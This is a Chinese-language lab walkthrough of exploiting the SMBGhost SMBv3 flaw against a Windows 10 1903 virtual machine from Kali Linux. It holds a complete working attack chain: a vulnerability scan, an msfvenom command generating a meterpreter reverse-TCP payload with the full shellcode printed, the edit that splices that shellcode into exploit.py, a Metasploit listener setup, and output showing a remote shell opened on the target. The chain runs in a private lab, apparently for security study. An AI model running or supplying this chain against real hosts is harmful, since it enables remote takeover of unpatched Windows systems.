一、环境
系统 版本 IP地址
Kali Kali2020.1 192.168.101.129
Windows Win10-1903版 192.168.101.128
二、实验步骤
1.上传相关软件包(SMBGhost_RCE_PoC-master、SMBGhost-master)
2.查看相关软件包是否上传成功
root@kali:~# ls
公共 视频 文档 音乐 SMBGhost-master.zip
模板 图片 下载 桌面 SMBGhost_RCE_PoC-master.zip
root@kali:~#
3.解压SMBGhost-master.zip压缩包并查看该解压出的文件
root@kali:~# unzip SMBGhost-master.zip
Archive: SMBGhost-master.zip
creating: SMBGhost-master/
inflating: SMBGhost-master/README.md
inflating: SMBGhost-master/scanner.py
inflating: SMBGhost-master/SMBGhost.pcap
root@kali:~# cd SMBGhost-master/
root@kali:~/SMBGhost-master# ls
README.md scanner.py SMBGhost.pcap
root@kali:~/SMBGhost-master#
4.使用Python3结合SMBGhost-master中的scanner.py文件进行测试是否存在漏洞
root@kali:~/SMBGhost-master# python3 scanner.py 192.168.101.128
192.168.101.128 Vulnerable
root@kali:~/SMBGhost-master#
5.解压SMBGhost_RCE_PoC-master.zip压缩包并查看该解压出的文件root@kali:~/SMBGhost-master# cd
root@kali:~# unzip SMBGhost_RCE_PoC-master.zip
Archive: SMBGhost_RCE_PoC-master.zip
f55e6abd47cb3a4f771c965053a5a92133a18781
creating: SMBGhost_RCE_PoC-master/
inflating: SMBGhost_RCE_PoC-master/.gitignore
inflating: SMBGhost_RCE_PoC-master/README.md
inflating: SMBGhost_RCE_PoC-master/exploit.py
inflating: SMBGhost_RCE_PoC-master/kernel_shellcode.asm
inflating: SMBGhost_RCE_PoC-master/lznt1.py
inflating: SMBGhost_RCE_PoC-master/smb_win.py
root@kali:~# cd SMBGhost_RCE_PoC-master/
root@kali:~/SMBGhost_RCE_PoC-master# ls
exploit.py kernel_shellcode.asm lznt1.py README.md smb_win.py
root@kali:~/SMBGhost_RCE_PoC-master#
6.使用msfvenom工具将回显出的pyload
root@kali:~/SMBGhost_RCE_PoC-master# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.129 lport=9999 -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of python file: 2688 bytes
buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x77\x55\x89\xfd\x29\x7f\x6c"
buf += b"\x86\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\x8b\x1d\x0a\x19\xd9\x97\xa0\x86\x77\x55\xc8\xac\x68"
buf += b"\x2f\x3e\xd7\x21\x1d\xb8\x2f\x4c\x37\xe7\xd4\x17\x1d"
buf += b"\x02\xaf\x31\x37\xe7\xd4\x57\x1d\x02\x8f\x79\x37\x63"
buf += b"\x31\x3d\x1f\xc4\xcc\xe0\x37\x5d\x46\xdb\x69\xe8\x81"
buf += b"\x2b\x53\x4c\xc7\xb6\x9c\x84\xbc\x28\xbe\x8e\x6b\x25"
buf += b"\x14\xd8\xb5\xa2\x2d\x4c\x0d\x35\x69\xc1\xfc\xf9\x19"
buf += b"\xed\xfe\x6f\x5e\x8b\xf2\xac\x0d\x6c\x86\x77\xde\x09"
buf += b"\x75\x29\x7f\x6c\xce\xf2\x95\xfd\x9a\x61\x7e\xbc\xd6"
buf += b"\xfc\x1d\x91\xb9\xa2\x3f\x4c\xcf\x76\x85\x6a\xab\x61"
buf += b"\x80\xa5\xc7\xfc\x61\x01\xb5\x28\xa9\x21\xb7\xbe\x1d"
buf += b"\xb8\x3d\x85\x3e\xad\x4f\x7a\x14\x88\x3c\x11\x9f\x19"
buf += b"\x77\x3b\x56\xc5\xd9\x21\x3a\x55\x57\x02\x8d\xd1\xb9"
buf += b"\xa2\x3f\x48\xcf\x76\x85\xef\xbc\xa2\x73\x24\xc2\xfc"
buf += b"\x15\x95\xb4\x28\xaf\x2d\x0d\x73\xdd\xc1\xfc\xf9\x3e"
buf += b"\x34\xc7\x2f\x0b\xd0\xa7\x68\x27\x2d\xdf\x36\x0f\xc1"
buf += b"\x7e\xc5\x5f\x2d\xd4\x88\xb5\xd1\xbc\x70\x25\x24\x0d"
buf += b"\x65\xbc\xc2\x02\xd6\x80\x31\xcf\xc9\x22\xfa\xcf\x76"
buf += b"\x4c\x5e\x86\x77\x14\xdf\xb4\xa0\x99\x24\x07\x9b\xf5"
buf += b"\x88\xfd\x29\x36\xe5\x63\x3e\xe9\x8b\xfd\x0e\x70\xac"
buf += b"\x2e\x12\xd4\xc8\xa9\x60\xf6\x88\xca\xfe\xa4\xc8\x47"
buf += b"\x65\x08\x4a\x81\x88\x80\xc5\x74\xc3\x17\x6d\x87\x77"
buf += b"\x55\xd0\xbc\x93\x56\xec\xed\x77\xaa\x5c\x97\x23\x3e"
buf += b"\x32\xd6\x27\x18\xb8\x34\x64\x4e\xac\xce\x88\x95\xc1"
buf += b"\x74\xeb\x37\x93\x46\x3f\xdc\x48\xbc\x93\x95\x63\x59"
buf += b"\x97\xaa\x5c\xb5\xa0\xb8\x06\x96\x36\x0d\xc5\x74\xcb"
buf += b"\x37\xe5\x7f\x36\xef\x10\x58\x5d\x1e\x93\x53\xf2\x95"
buf += b"\xfd\xf7\x60\x80\xa2\xf3\x92\xbd\x1a\xfd\x29\x7f\x24"
buf += b"\x05\x9b\x45\xc1\x74\xcb\x32\x5d\x4f\x1d\x51\xc8\xa5"
buf += b"\x61\xf6\x95\xc7\xcd\x57\x50\x35\x76\x80\xb9\x05\x8f"
buf += b"\x55\xf7\xa8\x61\xfc\xa8\xa6\x29\xdc\x7f\x97\x69\x3e"
buf += b"\x35\xee\x77\x45\x89\xfd\x68\x27\x24\x0f\x85\x1d\xb8"
buf += b"\x34\x68\xc5\x34\x22\x24\xb0\x76\x28\x61\xf6\xaf\xcf"
buf += b"\xfe\x92\xc4\xcc\xe0\x36\xe5\x76\x3f\xdc\x53\xb5\xa0"
buf += b"\x86\x2d\x3c\x75\x8c\x41\xa2\xd6\xaa\xef\x7e\x77\x28"
buf += b"\xa1\xa5\x68\x28\x35\xee\x77\x15\x89\xfd\x68\x27\x06"
buf += b"\x86\x2d\x14\x33\xf6\x06\x70\x5c\x79\xa2\x02\xd0\xbc"
buf += b"\x93\x0a\x02\xcb\x16\xaa\x5c\xb4\xd6\xb1\x85\xba\x88"
buf += b"\xaa\x76\xb5\x28\xbc\x24\xaf\xb1\x1d\x0c\x0b\x5c\xcb"
buf += b"\x2d\x79\x90\x0d\xe3\xfd\x70\x36\xab\x44\x87\xe0\x2b"
buf += b"\xab\xd6\xaa\x6c\x86"
root@kali:~/SMBGhost_RCE_PoC-master#
7.修改exploit.py文件将第91行至127行进行删除
root@kali:~/SMBGhost_RCE_PoC-master# vim exploit.py
root@kali:~/SMBGhost_RCE_PoC-master# cat -n exploit.py
1 #!/usr/bin/env python
2
3 import sys
4 import socket
5 import struct
6 import argparse
7
8 from lznt1 import compress, compress_evil
9 from smb_win import smb_negotiate, smb_compress
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
90
91
92
93 PML4_SELFREF = 0
94 PHAL_HEAP = 0
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
420 if __name__ == "__main__":
421 parser = argparse.ArgumentParser()
422 parser.add_argument("-ip", help="IP address of target", required=True)
423 parser.add_argument("-p", "--port", default=445, help="SMB port, \
424 default: 445", required=False, type=int)
425 args = parser.parse_args()
426
427 do_rce(args.ip, args.port)
root@kali:~/SMBGhost_RCE_PoC-master#
8.将上面通过msfvenom会显出的内容进行复制到exploit.py文件的第91行位置并在粘贴后的buf文件后一行写入USER_PAYLOAD = buf内容让其可以调用该文件root@kali:~/SMBGhost_RCE_PoC-master# vim exploit.py
root@kali:~/SMBGhost_RCE_PoC-master# cat -n exploit.py
1 #!/usr/bin/env python
2
3 import sys
4 import socket
5 import struct
6 import argparse
7
8 from lznt1 import compress, compress_evil
9 from smb_win import smb_negotiate, smb_compress
10
11 # Use lowstub jmp bytes to signature search
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
90
91 buf = b""
92 buf += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05"
93 buf += b"\xef\xff\xff\xff\x48\xbb\x77\x55\x89\xfd\x29\x7f\x6c"
94 buf += b"\x86\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
95 buf += b"\x8b\x1d\x0a\x19\xd9\x97\xa0\x86\x77\x55\xc8\xac\x68"
96 buf += b"\x2f\x3e\xd7\x21\x1d\xb8\x2f\x4c\x37\xe7\xd4\x17\x1d"
97 buf += b"\x02\xaf\x31\x37\xe7\xd4\x57\x1d\x02\x8f\x79\x37\x63"
98 buf += b"\x31\x3d\x1f\xc4\xcc\xe0\x37\x5d\x46\xdb\x69\xe8\x81"
99 buf += b"\x2b\x53\x4c\xc7\xb6\x9c\x84\xbc\x28\xbe\x8e\x6b\x25"
100 buf += b"\x14\xd8\xb5\xa2\x2d\x4c\x0d\x35\x69\xc1\xfc\xf9\x19"
101 buf += b"\xed\xfe\x6f\x5e\x8b\xf2\xac\x0d\x6c\x86\x77\xde\x09"
102 buf += b"\x75\x29\x7f\x6c\xce\xf2\x95\xfd\x9a\x61\x7e\xbc\xd6"
103 buf += b"\xfc\x1d\x91\xb9\xa2\x3f\x4c\xcf\x76\x85\x6a\xab\x61"
104 buf += b"\x80\xa5\xc7\xfc\x61\x01\xb5\x28\xa9\x21\xb7\xbe\x1d"
105 buf += b"\xb8\x3d\x85\x3e\xad\x4f\x7a\x14\x88\x3c\x11\x9f\x19"
106 buf += b"\x77\x3b\x56\xc5\xd9\x21\x3a\x55\x57\x02\x8d\xd1\xb9"
107 buf += b"\xa2\x3f\x48\xcf\x76\x85\xef\xbc\xa2\x73\x24\xc2\xfc"
108 buf += b"\x15\x95\xb4\x28\xaf\x2d\x0d\x73\xdd\xc1\xfc\xf9\x3e"
109 buf += b"\x34\xc7\x2f\x0b\xd0\xa7\x68\x27\x2d\xdf\x36\x0f\xc1"
110 buf += b"\x7e\xc5\x5f\x2d\xd4\x88\xb5\xd1\xbc\x70\x25\x24\x0d"
111 buf += b"\x65\xbc\xc2\x02\xd6\x80\x31\xcf\xc9\x22\xfa\xcf\x76"
112 buf += b"\x4c\x5e\x86\x77\x14\xdf\xb4\xa0\x99\x24\x07\x9b\xf5"
113 buf += b"\x88\xfd\x29\x36\xe5\x63\x3e\xe9\x8b\xfd\x0e\x70\xac"
114 buf += b"\x2e\x12\xd4\xc8\xa9\x60\xf6\x88\xca\xfe\xa4\xc8\x47"
115 buf += b"\x65\x08\x4a\x81\x88\x80\xc5\x74\xc3\x17\x6d\x87\x77"
116 buf += b"\x55\xd0\xbc\x93\x56\xec\xed\x77\xaa\x5c\x97\x23\x3e"
117 buf += b"\x32\xd6\x27\x18\xb8\x34\x64\x4e\xac\xce\x88\x95\xc1"
118 buf += b"\x74\xeb\x37\x93\x46\x3f\xdc\x48\xbc\x93\x95\x63\x59"
119 buf += b"\x97\xaa\x5c\xb5\xa0\xb8\x06\x96\x36\x0d\xc5\x74\xcb"
120 buf += b"\x37\xe5\x7f\x36\xef\x10\x58\x5d\x1e\x93\x53\xf2\x95"
121 buf += b"\xfd\xf7\x60\x80\xa2\xf3\x92\xbd\x1a\xfd\x29\x7f\x24"
122 buf += b"\x05\x9b\x45\xc1\x74\xcb\x32\x5d\x4f\x1d\x51\xc8\xa5"
123 buf += b"\x61\xf6\x95\xc7\xcd\x57\x50\x35\x76\x80\xb9\x05\x8f"
124 buf += b"\x55\xf7\xa8\x61\xfc\xa8\xa6\x29\xdc\x7f\x97\x69\x3e"
125 buf += b"\x35\xee\x77\x45\x89\xfd\x68\x27\x24\x0f\x85\x1d\xb8"
126 buf += b"\x34\x68\xc5\x34\x22\x24\xb0\x76\x28\x61\xf6\xaf\xcf"
127 buf += b"\xfe\x92\xc4\xcc\xe0\x36\xe5\x76\x3f\xdc\x53\xb5\xa0"
128 buf += b"\x86\x2d\x3c\x75\x8c\x41\xa2\xd6\xaa\xef\x7e\x77\x28"
129 buf += b"\xa1\xa5\x68\x28\x35\xee\x77\x15\x89\xfd\x68\x27\x06"
130 buf += b"\x86\x2d\x14\x33\xf6\x06\x70\x5c\x79\xa2\x02\xd0\xbc"
131 buf += b"\x93\x0a\x02\xcb\x16\xaa\x5c\xb4\xd6\xb1\x85\xba\x88"
132 buf += b"\xaa\x76\xb5\x28\xbc\x24\xaf\xb1\x1d\x0c\x0b\x5c\xcb"
133 buf += b"\x2d\x79\x90\x0d\xe3\xfd\x70\x36\xab\x44\x87\xe0\x2b"
134 buf += b"\xab\xd6\xaa\x6c\x86"
135
136 USER_PAYLOAD = buf
137
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
465 if __name__ == "__main__":
466 parser = argparse.ArgumentParser()
467 parser.add_argument("-ip", help="IP address of target", required=True)
468 parser.add_argument("-p", "--port", default=445, help="SMB port, \
469 default: 445", required=False, type=int)
470 args = parser.parse_args()
471
472 do_rce(args.ip, args.port)
root@kali:~/SMBGhost_RCE_PoC-master#
9.初始化数据库,并进入msf工具
root@kali:~/SMBGhost_RCE_PoC-master# service postgresql start
root@kali:~/SMBGhost_RCE_PoC-master# msfdb init
[i] Database already started
[+] Creating database user 'msf'
为新角色输入的口令:
再输入一遍:
[+] Creating databases 'msf'
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating databases 'msf_test'
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
root@kali:~/SMBGhost_RCE_PoC-master#
10.启动msf数据库,打开监听模块
root@kali:~/SMBGhost_RCE_PoC-master# msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v5.0.71-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > service postgresql start
[*] exec: service postgresql start
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.101.129
lhost => 192.168.101.129
msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) >
11.开始攻击,并查看拿到的权限
root@kali:~/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.101.128
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff78f80000000
[+] found PML4 self-ref entry 197
[+] found HalpInterruptController at fffff78f80001478
[+] found HalpApicRequestInterrupt at fffff8011b6c5bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at ffffcbfbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000950!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...
root@kali:~/SMBGhost_RCE_PoC-master#
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.101.129:9999
[*] Sending stage (206403 bytes) to 192.168.101.128
[*] Meterpreter session 1 opened (192.168.101.129:9999 -> 192.168.101.128:49686) at 2021-02-24 02:11:01 -0500
meterpreter > shell
Process 5968 created.
Channel 1 created.
Microsoft Windows [�汾 10.0.18362.30]
(c) 2019 Microsoft Corporation����������Ȩ����
C:\Windows\system32>ipconfig
Windows IP ����
��̫�������� Ethernet0:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::79ac:3add:3bd3:5ac7%10
IPv4 ��ַ . . . . . . . . . . . . : 192.168.101.128
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . : 192.168.101.2
��̫�������� ������������:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
C:\Windows\system32>
-d9c7bca71f594eefa0959028d911e9f6.png)